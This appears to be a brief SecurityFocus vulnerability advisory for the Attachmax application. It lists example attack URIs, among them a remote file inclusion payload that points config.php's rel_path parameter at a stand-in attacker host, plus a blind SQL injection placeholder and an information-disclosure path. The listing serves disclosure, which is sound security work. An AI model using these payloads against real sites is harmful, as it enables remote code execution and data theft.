Attachmax Multiple Security Vulnerabilities

The following example URIs are available:

http://www.example.com/[path]/info.php
http://www.example.com/[path]/config.php?rel_path=http://www.attacker.com/evil?
http://www.example.com/[path]/index.php?page=Search&category=[BlindSQL]


 

Privacy Statement
Copyright 2010, SecurityFocus